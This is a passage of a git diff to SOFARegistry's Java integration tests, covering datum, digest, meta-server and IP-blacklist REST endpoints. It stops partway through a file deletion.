com.alipay.sofa.registry.common.model.constants.ValueConstants.DEFAULT_INSTANCE_ID; -import static javax.ws.rs.core.MediaType.APPLICATION_JSON; -import static org.junit.Assert.assertEquals; -import static org.junit.Assert.assertTrue; - /** * @author xuanbei * @since 2019/1/14 */ @RunWith(SpringRunner.class) public class DataDigestResourceTest extends BaseIntegrationTest { + private static final MySubscriberDataObserver observer = new MySubscriberDataObserver(); + private static final String dataId = "test-dataId-" + System.nanoTime(); + private static final String value = "DataDigestResourceTest"; - @BeforeClass - public static void beforeClass() throws Exception { - clientOff(); - dataId = "test-dataId-" + System.currentTimeMillis(); - value = "DataDigestResourceTest"; + @BeforeClass + public static void beforeClass() throws Exception { + clientOff(); + Thread.sleep(2000L); - PublisherRegistration registration = new PublisherRegistration(dataId); - registryClient1.register(registration, value); - Thread.sleep(500L); + PublisherRegistration registration = new PublisherRegistration(dataId); + registryClient1.register(registration, value); - SubscriberRegistration subReg = new SubscriberRegistration(dataId, - new MySubscriberDataObserver()); - subReg.setScopeEnum(ScopeEnum.dataCenter); - registryClient1.register(subReg); - Thread.sleep(500L); - } + Thread.sleep(2000L); + SubscriberRegistration subReg = new SubscriberRegistration(dataId, observer); + subReg.setScopeEnum(ScopeEnum.dataCenter); + registryClient1.register(subReg); + Thread.sleep(2000L); - @AfterClass - public static void afterClass() { - registryClient1.unregister(dataId, DEFAULT_GROUP, RegistryType.SUBSCRIBER); - registryClient1.unregister(dataId, DEFAULT_GROUP, RegistryType.PUBLISHER); - } + assertEquals(dataId, observer.dataId); + assertEquals(LOCAL_REGION, observer.userData.getLocalZone()); + assertEquals(1, observer.userData.getZoneData().size()); + assertEquals(1, observer.userData.getZoneData().values().size()); + assertEquals(true, observer.userData.getZoneData().containsKey(LOCAL_REGION)); + assertEquals(1, observer.userData.getZoneData().get(LOCAL_REGION).size()); + assertEquals(value, observer.userData.getZoneData().get(LOCAL_REGION).get(0)); + } - @Test - public void testGetDatumByDataInfoId() throws Exception { - Map datumMap = dataChannel.getWebTarget().path("digest/datum/query") - .queryParam("dataId", dataId).queryParam("group", DEFAULT_GROUP) + @AfterClass + public static void afterClass() { + registryClient1.unregister(dataId, DEFAULT_GROUP, RegistryType.SUBSCRIBER); + registryClient1.unregister(dataId, DEFAULT_GROUP, RegistryType.PUBLISHER); + } + + @Test + public void testGetDatumByDataInfoId() throws Exception { + Map datumMap = + dataChannel + .getWebTarget() + .path("digest/datum/query") + .queryParam("dataId", dataId) + .queryParam("group", DEFAULT_GROUP) .queryParam("instanceId", DEFAULT_INSTANCE_ID) - .queryParam("dataCenter", LOCAL_DATACENTER).request(APPLICATION_JSON) - .get(new GenericType>() { - }); - assertTrue(datumMap.size() == 1); - assertEquals(dataId, datumMap.get(LOCAL_DATACENTER).getDataId()); - assertEquals(1, datumMap.get(LOCAL_DATACENTER).getPubMap().size()); - assertEquals(value, bytes2Object(datumMap.get(LOCAL_DATACENTER).getPubMap().values() - .iterator().next().getDataList().get(0).getBytes())); - } + .queryParam("dataCenter", LOCAL_DATACENTER) + .request(APPLICATION_JSON) + .get(new GenericType>() {}); + assertTrue(datumMap.toString(), datumMap.size() == 1); + assertEquals(datumMap.toString(), dataId, datumMap.get(LOCAL_DATACENTER).getDataId()); + assertEquals(datumMap.toString(), 1, datumMap.get(LOCAL_DATACENTER).publisherSize()); + assertEquals( + value, + bytes2Object( + datumMap + .get(LOCAL_DATACENTER) + .getPubMap() + .values() + .iterator() + .next() + .getDataList() + .get(0) + .getBytes())); + } - @Test - public void testGetPublishersByConnectId() throws Exception { - Map parameters = new HashMap<>(); - parameters.put(LOCAL_ADDRESS, String.valueOf(getSourcePort(registryClient1))); - Map> publisherMap = dataChannel + @Test + public void testGetPublishersByConnectId() throws Exception { + Map parameters = new HashMap<>(); + parameters.put( + NetUtil.genHost(LOCAL_ADDRESS, getSourcePort(registryClient1)), + NetUtil.genHost(LOCAL_ADDRESS, 9600)); + Map> publisherMap = + dataChannel .getWebTarget() .path("digest/connect/query") .request(APPLICATION_JSON) - .post(Entity.entity(parameters, MediaType.APPLICATION_JSON), - new GenericType>>() { - }); - assertEquals(1, publisherMap.size()); - assertEquals(1, - publisherMap.get(LOCAL_ADDRESS + ":" + String.valueOf(getSourcePort(registryClient1))) - .size()); - assertEquals(dataId, - publisherMap.get(LOCAL_ADDRESS + ":" + String.valueOf(getSourcePort(registryClient1))) - .values().iterator().next().getDataId()); - assertEquals( - value, - bytes2Object(publisherMap - .get(LOCAL_ADDRESS + ":" + String.valueOf(getSourcePort(registryClient1))).values() - .iterator().next().getDataList().get(0).getBytes())); - } + .post( + Entity.entity(parameters, MediaType.APPLICATION_JSON), + new GenericType>>() {}); + assertEquals(1, publisherMap.size()); + assertEquals( + 1, + publisherMap + .get( + NetUtil.genHost(LOCAL_ADDRESS, getSourcePort(registryClient1)) + + ValueConstants.CONNECT_ID_SPLIT + + NetUtil.genHost(LOCAL_ADDRESS, 9600)) + .size()); + assertEquals( + dataId, + publisherMap + .get( + NetUtil.genHost(LOCAL_ADDRESS, getSourcePort(registryClient1)) + + ValueConstants.CONNECT_ID_SPLIT + + NetUtil.genHost(LOCAL_ADDRESS, 9600)) + .values() + .iterator() + .next() + .getDataId()); + assertEquals( + value, + bytes2Object( + publisherMap + .get( + NetUtil.genHost(LOCAL_ADDRESS, getSourcePort(registryClient1)) + + ValueConstants.CONNECT_ID_SPLIT + + NetUtil.genHost(LOCAL_ADDRESS, 9600)) + .values() + .iterator() + .next() + .getDataList() + .get(0) + .getBytes())); + } - @Test - public void testGetDatumCount() { - String countResult = dataChannel.getWebTarget().path("digest/datum/count") - .request(APPLICATION_JSON).get(String.class); - assertTrue(countResult.contains("[Publisher] size of publisher in DefaultDataCenter is 1")); - } -} \ No newline at end of file + @Test + public void testGetDatumCount() { + String countResult = + dataChannel + .getWebTarget() + .path("digest/datum/count") + .request(APPLICATION_JSON) + .get(String.class); + assertTrue( + countResult, + countResult.contains("[Publisher] size of publisher in DefaultDataCenter is 1")); + } + + @Test + public void testGetServerListAll() throws Exception { + + Map> sessionMap = + dataChannel + .getWebTarget() + .path("digest/session/serverList/query") + .request(APPLICATION_JSON) + .get(new GenericType>>() {}); + assertEquals(1, sessionMap.size()); + assertEquals(1, sessionMap.get(LOCAL_DATACENTER).size()); + assertTrue(sessionMap.get(LOCAL_DATACENTER).get(0).contains(LOCAL_ADDRESS)); + + Map> metaMap = + dataChannel + .getWebTarget() + .path("digest/meta/serverList/query") + .request(APPLICATION_JSON) + .get(new GenericType>>() {}); + assertEquals(metaMap.get(LOCAL_DATACENTER).get(0), LOCAL_ADDRESS); + } +} diff --git a/test/src/test/java/com/alipay/sofa/registry/test/resource/data/DatumApiResourceTest.java b/test/src/test/java/com/alipay/sofa/registry/test/resource/data/DatumApiResourceTest.java new file mode 100644 index 000000000..d1d6f2fa8 --- /dev/null +++ b/test/src/test/java/com/alipay/sofa/registry/test/resource/data/DatumApiResourceTest.java @@ -0,0 +1,323 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.test.resource.data; + +import static com.alipay.sofa.registry.client.constants.ValueConstants.DEFAULT_GROUP; +import static com.alipay.sofa.registry.common.model.constants.ValueConstants.DEFAULT_INSTANCE_ID; +import static org.junit.Assert.assertEquals; + +import com.alipay.sofa.registry.client.api.model.RegistryType; +import com.alipay.sofa.registry.client.api.registration.PublisherRegistration; +import com.alipay.sofa.registry.client.api.registration.SubscriberRegistration; +import com.alipay.sofa.registry.common.model.CommonResponse; +import com.alipay.sofa.registry.common.model.store.DataInfo; +import com.alipay.sofa.registry.core.model.ScopeEnum; +import com.alipay.sofa.registry.server.data.resource.DatumParam; +import com.alipay.sofa.registry.test.BaseIntegrationTest; +import java.util.Map; +import javax.ws.rs.client.Entity; +import javax.ws.rs.core.MediaType; +import org.junit.After; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.slf4j.Logger; +import org.slf4j.LoggerFactory; +import org.springframework.test.context.junit4.SpringRunner; + +/** + * @author kezhu.wukz + * @since 2020/1/22 + */ +@RunWith(SpringRunner.class) +public class DatumApiResourceTest extends BaseIntegrationTest { + + private static final Logger LOGGER = LoggerFactory.getLogger(DatumApiResourceTest.class); + + private static String publisherRegisterId = "registerId-123456789"; + + private String dataId = "test-dataId-" + System.currentTimeMillis(); + private String value = "DataDigestResourceTest"; + private String dataInfoId = DataInfo.toDataInfoId(dataId, DEFAULT_INSTANCE_ID, DEFAULT_GROUP); + + @Before + public void before() throws Exception { + LOGGER.info("DatumApiResourceTest beforeCall"); + + clientOff(); + Thread.sleep(2000L); + + PublisherRegistration registration = new PublisherRegistration(dataId); + registryClient1.register(registration, value); + Thread.sleep(2000L); + + MySubscriberDataObserver observer = new MySubscriberDataObserver(); + SubscriberRegistration subReg = new SubscriberRegistration(dataId, observer); + subReg.setScopeEnum(ScopeEnum.dataCenter); + registryClient1.register(subReg); + Thread.sleep(2000L); + + assertEquals(dataId, observer.dataId); + assertEquals(LOCAL_REGION, observer.userData.getLocalZone()); + assertEquals(1, observer.userData.getZoneData().size()); + assertEquals(1, observer.userData.getZoneData().values().size()); + assertEquals(true, observer.userData.getZoneData().containsKey(LOCAL_REGION)); + assertEquals(1, observer.userData.getZoneData().get(LOCAL_REGION).size()); + assertEquals(value, observer.userData.getZoneData().get(LOCAL_REGION).get(0)); + } + + @After + public void after() throws Exception { + registryClient1.unregister(dataId, DEFAULT_GROUP, RegistryType.SUBSCRIBER); + registryClient1.unregister(dataId, DEFAULT_GROUP, RegistryType.PUBLISHER); + // clientOff(); + } + + @Test + public void testException() { + DatumParam datumParam = new DatumParam(); + + { + CommonResponse response = + dataChannel + .getWebTarget() + .path("datum/api/get") + .request() + .post(Entity.entity(datumParam, MediaType.APPLICATION_JSON), CommonResponse.class); + LOGGER.info("testException for datum/api/get:" + response); + Assert.assertTrue(response.getMessage().contains("empty")); + } + + { + CommonResponse response = + dataChannel + .getWebTarget() + .path("datum/api/delete") + .request() + .post(Entity.entity(datumParam, MediaType.APPLICATION_JSON), CommonResponse.class); + LOGGER.info("testException for datum/api/delete:" + response); + Assert.assertTrue(response.getMessage().contains("empty")); + } + { + CommonResponse response = + dataChannel + .getWebTarget() + .path("datum/api/pub/add") + .request() + .post(Entity.entity(datumParam, MediaType.APPLICATION_JSON), CommonResponse.class); + LOGGER.info("testException for datum/api/pub/add:" + response); + Assert.assertTrue(response.getMessage().contains("empty")); + } + { + CommonResponse response = + dataChannel + .getWebTarget() + .path("datum/api/pub/delete") + .request() + .post(Entity.entity(datumParam, MediaType.APPLICATION_JSON), CommonResponse.class); + LOGGER.info("testException for datum/api/pub/delete:" + response); + Assert.assertTrue(response.getMessage().contains("empty")); + } + } + + @Test + public void testGet() { + // test get + { + DatumParam datumParam = new DatumParam(); + datumParam.setDataInfoId(dataInfoId); + CommonResponse response = + dataChannel + .getWebTarget() + .path("datum/api/get") + .request() + .post(Entity.entity(datumParam, MediaType.APPLICATION_JSON), CommonResponse.class); + + LOGGER.info("testGet:" + response); + Assert.assertTrue(response.getMessage().contains(dataId)); + } + // test get not found + { + DatumParam datumParam = new DatumParam(); + datumParam.setDataInfoId(dataInfoId + System.currentTimeMillis()); + CommonResponse response = + dataChannel + .getWebTarget() + .path("datum/api/get") + .request() + .post(Entity.entity(datumParam, MediaType.APPLICATION_JSON), CommonResponse.class); + + LOGGER.info("testGet:" + response); + Assert.assertTrue(response.getMessage().contains("not found")); + } + } + + @Test + public void testAddDeletePub() { + // add + { + DatumParam datumParam = new DatumParam(); + datumParam.setDataInfoId(dataInfoId); + String testZone = "testZone"; + datumParam.setPublisherCell(testZone); + datumParam.setPublisherDataBox("test"); + datumParam.setPublisherConnectId(LOCAL_ADDRESS + ":12345_" + LOCAL_ADDRESS + ":9600"); + datumParam.setPublisherRegisterId(publisherRegisterId); + CommonResponse response = + dataChannel + .getWebTarget() + .path("datum/api/pub/add") + .request() + .post(Entity.entity(datumParam, MediaType.APPLICATION_JSON), CommonResponse.class); + + LOGGER.info("testAddPub:" + response); + Assert.assertTrue(response.getMessage(), response.getMessage().contains(dataId)); + Assert.assertTrue(response.getMessage(), response.getMessage().contains(testZone)); + } + // delete + { + DatumParam datumParam = new DatumParam(); + datumParam.setDataInfoId(dataInfoId); + String testZone = "testZone"; + datumParam.setPublisherCell(testZone); + datumParam.setPublisherRegisterId(publisherRegisterId); + CommonResponse response = + dataChannel + .getWebTarget() + .path("datum/api/pub/delete") + .request() + .post(Entity.entity(datumParam, MediaType.APPLICATION_JSON), CommonResponse.class); + LOGGER.info("testDeletePub:" + response); + Assert.assertFalse(response.getMessage().contains(publisherRegisterId)); + } + } + + @Test + public void testDelete() { + // add + { + DatumParam datumParam = new DatumParam(); + datumParam.setDataInfoId(dataInfoId); + String testZone = "testZone"; + datumParam.setPublisherCell(testZone); + datumParam.setPublisherDataBox("test"); + datumParam.setPublisherConnectId(LOCAL_ADDRESS + ":12345_" + LOCAL_ADDRESS + ":9600"); + datumParam.setPublisherRegisterId(publisherRegisterId); + CommonResponse response = + dataChannel + .getWebTarget() + .path("datum/api/pub/add") + .request() + .post(Entity.entity(datumParam, MediaType.APPLICATION_JSON), CommonResponse.class); + + LOGGER.info("testAddPub:" + response); + Assert.assertTrue(response.getMessage().contains(dataId)); + Assert.assertTrue(response.getMessage().contains(testZone)); + } + // delete + { + DatumParam datumParam = new DatumParam(); + datumParam.setDataInfoId(dataInfoId); + CommonResponse response = + dataChannel + .getWebTarget() + .path("datum/api/delete") + .request() + .post(Entity.entity(datumParam, MediaType.APPLICATION_JSON), CommonResponse.class); + LOGGER.info("testDelete:" + response); + Assert.assertFalse(response.getMessage().contains(publisherRegisterId)); + } + } + + @Test + public void testGetDatumVersions() { + // test + { + DatumParam datumParam = new DatumParam(); + datumParam.setDataCenter(LOCAL_DATACENTER); + Map response = + dataChannel + .getWebTarget() + .path("datum/api/getDatumVersions") + .request() + .post(Entity.entity(datumParam, MediaType.APPLICATION_JSON), Map.class); + + LOGGER.info("testGetDatumVersions:" + response); + Assert.assertTrue(response.get(dataInfoId) != null); + } + // test not found + { + DatumParam datumParam = new DatumParam(); + datumParam.setDataCenter(LOCAL_DATACENTER + System.currentTimeMillis()); + Map response = + dataChannel + .getWebTarget() + .path("datum/api/getDatumVersions") + .request() + .post(Entity.entity(datumParam, MediaType.APPLICATION_JSON), Map.class); + + LOGGER.info("testGetDatumVersions:" + response); + Assert.assertTrue(response.get(dataInfoId) == null); + } + } + + @Test + public void testGetDatumVersion() { + { + DatumParam datumParam = new DatumParam(); + datumParam.setDataCenter(LOCAL_DATACENTER); + datumParam.setDataInfoId(dataInfoId); + String response = + dataChannel + .getWebTarget() + .path("datum/api/getDatumVersion") + .request() + .post(Entity.entity(datumParam, MediaType.APPLICATION_JSON), String.class); + + LOGGER.info("testGetDatumVersions:" + response); + Assert.assertTrue(response.contains(dataInfoId)); + } + + { + DatumParam datumParam = new DatumParam(); + datumParam.setDataCenter(LOCAL_DATACENTER + System.currentTimeMillis()); + datumParam.setDataInfoId(dataInfoId); + String response = + dataChannel + .getWebTarget() + .path("datum/api/getDatumVersion") + .request() + .post(Entity.entity(datumParam, MediaType.APPLICATION_JSON), String.class); + + LOGGER.info("testGetDatumVersions:" + response); + Assert.assertTrue(response.contains(dataInfoId)); + } + } + + @Test + public void testGetDatumSize() { + DatumParam datumParam = new DatumParam(); + datumParam.setDataCenter(LOCAL_DATACENTER); + datumParam.setDataInfoId(dataInfoId); + Map response = + dataChannel.getWebTarget().path("datum/api/getDatumSizes").request().get(Map.class); + + LOGGER.info("testGetDatumSize:" + response); + Assert.assertTrue(response.get(LOCAL_DATACENTER).intValue() > 0); + } +} diff --git a/test/src/test/java/com/alipay/sofa/registry/test/resource/meta/BlacklistTest.java b/test/src/test/java/com/alipay/sofa/registry/test/resource/meta/BlacklistTest.java new file mode 100644 index 000000000..6daecfc41 --- /dev/null +++ b/test/src/test/java/com/alipay/sofa/registry/test/resource/meta/BlacklistTest.java @@ -0,0 +1,243 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.test.resource.meta; + +import static com.alipay.sofa.registry.client.constants.ValueConstants.DEFAULT_GROUP; +import static com.alipay.sofa.registry.common.model.constants.ValueConstants.DEFAULT_INSTANCE_ID; +import static javax.ws.rs.core.MediaType.APPLICATION_JSON; +import static org.junit.Assert.assertEquals; +import static org.junit.Assert.assertTrue; + +import com.alipay.sofa.registry.client.api.model.RegistryType; +import com.alipay.sofa.registry.client.api.registration.PublisherRegistration; +import com.alipay.sofa.registry.client.api.registration.SubscriberRegistration; +import com.alipay.sofa.registry.common.model.store.DataInfo; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.common.model.store.Subscriber; +import com.alipay.sofa.registry.core.model.Result; +import com.alipay.sofa.registry.core.model.ScopeEnum; +import com.alipay.sofa.registry.net.NetUtil; +import com.alipay.sofa.registry.server.session.filter.blacklist.BlacklistConstants; +import com.alipay.sofa.registry.test.BaseIntegrationTest; +import com.fasterxml.jackson.databind.ObjectMapper; +import com.google.common.collect.Maps; +import java.util.*; +import javax.ws.rs.client.Entity; +import javax.ws.rs.core.GenericType; +import javax.ws.rs.core.MediaType; +import org.junit.AfterClass; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.springframework.test.context.junit4.SpringRunner; + +/** + * @author shangyu.wh + * @since 2019/1/14 + */ +@RunWith(SpringRunner.class) +public class BlacklistTest extends BaseIntegrationTest { + + @Test + public void testBlacklistUpdate() throws Exception { + + Map>> map = new HashMap<>(); + Set set1 = new HashSet<>(); + Set set2 = new HashSet<>(); + set1.add("193.165.0.1"); + set1.add("193.165.0.2"); + set2.add("193.165.0.3"); + set2.add("193.165.0.4"); + + Map> map1 = Maps.newHashMap(); + map1.put(BlacklistConstants.IP_FULL, set1); + + Map> map2 = Maps.newHashMap(); + map2.put(BlacklistConstants.IP_FULL, set2); + + map.put(BlacklistConstants.FORBIDDEN_PUB, map1); + map.put(BlacklistConstants.FORBIDDEN_SUB_BY_PREFIX, map2); + + ObjectMapper mapper = new ObjectMapper(); + + Result response = + getMetaChannel() + .getWebTarget() + .path("blacklist/update") + .request() + .post( + Entity.entity(mapper.writeValueAsString(map), MediaType.APPLICATION_JSON), + Result.class); + + assertTrue(response.isSuccess()); + } + + @Test + public void testBlacklistUpdatePub() throws Exception { + + Map>> map = new HashMap<>(); + Set set1 = new HashSet<>(); + Set set2 = new HashSet<>(); + String local = NetUtil.getLocalAddress().getHostAddress(); + set1.add(local); + set2.add(local); + + Map> map1 = Maps.newHashMap(); + map1.put(BlacklistConstants.IP_FULL, set1); + + Map> map2 = Maps.newHashMap(); + map2.put(BlacklistConstants.IP_FULL, set2); + + map.put(BlacklistConstants.FORBIDDEN_PUB, map1); + + ObjectMapper mapper = new ObjectMapper(); + + Result response = + getMetaChannel() + .getWebTarget() + .path("blacklist/update") + .request() + .post( + Entity.entity(mapper.writeValueAsString(map), MediaType.APPLICATION_JSON), + Result.class); + + assertTrue(response.isSuccess()); + + // wait for new list meta dispatch to session + Thread.sleep(2000L); + + String dataId = "test-dataId-blacklist"; + String value = "test blacklist"; + + PublisherRegistration registration = new PublisherRegistration(dataId); + registryClient1.register(registration, value); + Thread.sleep(2000L); + + MySubscriberDataObserver observer = new MySubscriberDataObserver(); + SubscriberRegistration subReg = new SubscriberRegistration(dataId, observer); + subReg.setScopeEnum(ScopeEnum.dataCenter); + + registryClient1.register(subReg); + + Thread.sleep(2000L); + assertEquals(dataId, observer.dataId); + assertEquals(LOCAL_REGION, observer.userData.getLocalZone()); + + Map> publisherMap = + sessionChannel + .getWebTarget() + .path("digest/pub/data/query") + .queryParam( + "dataInfoId", DataInfo.toDataInfoId(dataId, DEFAULT_INSTANCE_ID, DEFAULT_GROUP)) + .request(APPLICATION_JSON) + .get(new GenericType>>() {}); + assertEquals(0, publisherMap.size()); + + Map> subscriberMap = + sessionChannel + .getWebTarget() + .path("digest/sub/data/query") + .queryParam( + "dataInfoId", DataInfo.toDataInfoId(dataId, DEFAULT_INSTANCE_ID, DEFAULT_GROUP)) + .request(APPLICATION_JSON) + .get(new GenericType>>() {}); + assertEquals(1, subscriberMap.size()); + assertEquals(1, subscriberMap.get("SUB").size()); + assertEquals(dataId, subscriberMap.get("SUB").get(0).getDataId()); + } + + @Test + public void testBlacklistUpdateSub() throws Exception { + + Map>> map = new HashMap<>(); + Set set1 = new HashSet<>(); + Set set2 = new HashSet<>(); + String local = NetUtil.getLocalAddress().getHostAddress(); + set1.add(local); + set2.add(local); + + Map> map1 = Maps.newHashMap(); + map1.put(BlacklistConstants.IP_FULL, set1); + + Map> map2 = Maps.newHashMap(); + map2.put(BlacklistConstants.IP_FULL, set2); + + map.put(BlacklistConstants.FORBIDDEN_SUB_BY_PREFIX, map2); + + ObjectMapper mapper = new ObjectMapper(); + Result response = + getMetaChannel() + .getWebTarget() + .path("blacklist/update") + .request() + .post( + Entity.entity(mapper.writeValueAsString(map), MediaType.APPLICATION_JSON), + Result.class); + + assertTrue(response.isSuccess()); + + // wait for new list meta dispatch to session + Thread.sleep(2000L); + + String dataId = "test-dataId-blacklist2"; + String value = "test blacklist2"; + + PublisherRegistration registration = new PublisherRegistration(dataId); + registryClient1.register(registration, value); + Thread.sleep(2000L); + MySubscriberDataObserver observer = new MySubscriberDataObserver(); + SubscriberRegistration subReg = new SubscriberRegistration(dataId, observer); + subReg.setScopeEnum(ScopeEnum.dataCenter); + + registryClient1.register(subReg); + + Thread.sleep(2000L); + assertEquals(dataId, observer.dataId); + assertEquals(LOCAL_REGION, observer.userData.getLocalZone()); + + Map> publisherMap = + sessionChannel + .getWebTarget() + .path("digest/pub/data/query") + .queryParam( + "dataInfoId", DataInfo.toDataInfoId(dataId, DEFAULT_INSTANCE_ID, DEFAULT_GROUP)) + .request(APPLICATION_JSON) + .get(new GenericType>>() {}); + assertEquals(1, publisherMap.size()); + assertEquals(1, publisherMap.get("PUB").size()); + assertEquals(dataId, publisherMap.get("PUB").get(0).getDataId()); + assertEquals( + value, bytes2Object(publisherMap.get("PUB").get(0).getDataList().get(0).getBytes())); + + Map> subscriberMap = + sessionChannel + .getWebTarget() + .path("digest/sub/data/query") + .queryParam( + "dataInfoId", DataInfo.toDataInfoId(dataId, DEFAULT_INSTANCE_ID, DEFAULT_GROUP)) + .request(APPLICATION_JSON) + .get(new GenericType>>() {}); + assertEquals(0, subscriberMap.size()); + } + + @AfterClass + public static void afterClass() { + registryClient1.unregister("test-dataId-blacklist", DEFAULT_GROUP, RegistryType.SUBSCRIBER); + registryClient1.unregister("test-dataId-blacklist", DEFAULT_GROUP, RegistryType.PUBLISHER); + registryClient1.unregister("test-dataId-blacklist2", DEFAULT_GROUP, RegistryType.SUBSCRIBER); + registryClient1.unregister("test-dataId-blacklist2", DEFAULT_GROUP, RegistryType.PUBLISHER); + } +} diff --git a/test/src/test/java/com/alipay/sofa/registry/test/resource/meta/MetaDigestResourceTest.java b/test/src/test/java/com/alipay/sofa/registry/test/resource/meta/MetaDigestResourceTest.java index ddce4c789..3136bd0b0 100644 --- a/test/src/test/java/com/alipay/sofa/registry/test/resource/meta/MetaDigestResourceTest.java +++ b/test/src/test/java/com/alipay/sofa/registry/test/resource/meta/MetaDigestResourceTest.java @@ -16,44 +16,70 @@ */ package com.alipay.sofa.registry.test.resource.meta; +import static javax.ws.rs.core.MediaType.APPLICATION_JSON; +import static org.junit.Assert.assertTrue; + +import com.alipay.sofa.registry.core.model.Result; import com.alipay.sofa.registry.test.BaseIntegrationTest; +import java.util.Map; +import org.junit.Assert; import org.junit.Test; import org.junit.runner.RunWith; import org.springframework.test.context.junit4.SpringRunner; -import java.util.Map; - -import static javax.ws.rs.core.MediaType.APPLICATION_JSON; -import static org.junit.Assert.assertTrue; - /** * @author xuanbei * @since 2019/1/14 */ @RunWith(SpringRunner.class) public class MetaDigestResourceTest extends BaseIntegrationTest { - @Test - public void testGetRegisterNodeByType() { - Map map = metaChannel.getWebTarget().path("digest/data/node/query") - .request(APPLICATION_JSON).get(Map.class); - assertTrue(map.size() == 1); - assertTrue(((Map) map.get(LOCAL_DATACENTER)).containsKey(LOCAL_ADDRESS)); - - map = metaChannel.getWebTarget().path("digest/meta/node/query").request(APPLICATION_JSON) + + @Test + public void testGetRegisterNodeByType() { + Map map = + getMetaChannel() + .getWebTarget() + .path("digest/data/node/query") + .request(APPLICATION_JSON) + .get(Map.class); + assertTrue(map.size() == 1); + assertTrue(map.toString(), ((Map) map.get(LOCAL_DATACENTER)).containsKey(LOCAL_ADDRESS)); + + map = + getMetaChannel() + .getWebTarget() + .path("digest/meta/node/query") + .request(APPLICATION_JSON) .get(Map.class); - assertTrue(map.size() == 1); - assertTrue(((Map) map.get(LOCAL_DATACENTER)).containsKey(LOCAL_ADDRESS)); - - map = metaChannel.getWebTarget().path("digest/session/node/query") - .request(APPLICATION_JSON).get(Map.class); - assertTrue(map.size() == 1); - assertTrue(((Map) map.get(LOCAL_DATACENTER)).containsKey(LOCAL_ADDRESS)); - } - - @Test - public void testGetPushSwitch() { - Map map = metaChannel.getWebTarget().path("digest/pushSwitch").request(APPLICATION_JSON) + assertTrue(map.size() == 1); + assertTrue(map.toString(), ((Map) map.get(LOCAL_DATACENTER)).containsKey(LOCAL_ADDRESS)); + + map = + getMetaChannel() + .getWebTarget() + .path("digest/session/node/query") + .request(APPLICATION_JSON) + .get(Map.class); + assertTrue(map.size() == 1); + assertTrue(map.toString(), ((Map) map.get(LOCAL_DATACENTER)).containsKey(LOCAL_ADDRESS)); + } + + @Test + public void testGetPushSwitch() { + Result result = + getMetaChannel() + .getWebTarget() + .path("stopPushDataSwitch/close") + .request(APPLICATION_JSON) + .get(Result.class); + Assert.assertTrue(result.isSuccess()); + Map map = + getMetaChannel() + .getWebTarget() + .path("digest/pushSwitch") + .request(APPLICATION_JSON) .get(Map.class); - assertTrue("open".equals(map.get("pushSwitch"))); - } + + Assert.assertEquals(map.get("stopPush"), "false"); + } } diff --git a/test/src/test/java/com/alipay/sofa/registry/test/resource/meta/MetaStoreResourceTest.java b/test/src/test/java/com/alipay/sofa/registry/test/resource/meta/MetaStoreResourceTest.java deleted file mode 100644 index 2c3407c7e..000000000 --- a/test/src/test/java/com/alipay/sofa/registry/test/resource/meta/MetaStoreResourceTest.java +++ /dev/null @@ -1,67 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.test.resource.meta; - -import com.alipay.sofa.registry.core.model.Result; -import com.alipay.sofa.registry.test.BaseIntegrationTest; -import org.junit.Test; -import org.junit.runner.RunWith; -import org.springframework.test.context.junit4.SpringRunner; - -import javax.ws.rs.client.Entity; -import javax.ws.rs.core.Form; -import javax.ws.rs.core.MediaType; -import java.util.List; - -import static javax.ws.rs.core.MediaType.APPLICATION_JSON; -import static org.junit.Assert.assertEquals; -import static org.junit.Assert.assertTrue; - -/** - * @author xuanbei - * @since 2019/1/14 - */ -@RunWith(SpringRunner.class) -public class MetaStoreResourceTest extends BaseIntegrationTest { - @Test - public void testManageMetaStoreResource() { - List list = metaChannel.getWebTarget().path("manage/queryPeer").request(APPLICATION_JSON) - .get(List.class); - assertTrue(list.size() == 1); - assertEquals(LOCAL_ADDRESS, list.get(0)); - } - - @Test - public void testChangePeer() { - Form form = new Form(); - form.param("ipAddressList", LOCAL_ADDRESS); - Result result = metaChannel.getWebTarget().path("manage/changePeer") - .request(APPLICATION_JSON) - .post(Entity.entity(form, MediaType.APPLICATION_FORM_URLENCODED_TYPE), Result.class); - assertTrue(result.isSuccess()); - } - - @Test - public void resetPeer() { - Form form = new Form(); - form.param("ipAddressList", LOCAL_ADDRESS); - Result result = metaChannel.getWebTarget().path("manage/resetPeer") - .request(APPLICATION_JSON) - .post(Entity.entity(form, MediaType.APPLICATION_FORM_URLENCODED_TYPE), Result.class); - assertTrue(result.isSuccess()); - } -} diff --git a/test/src/test/java/com/alipay/sofa/registry/test/resource/meta/PersistentDataResourceTest.java b/test/src/test/java/com/alipay/sofa/registry/test/resource/meta/PersistentDataResourceTest.java deleted file mode 100644 index 547cc8c70..000000000 --- 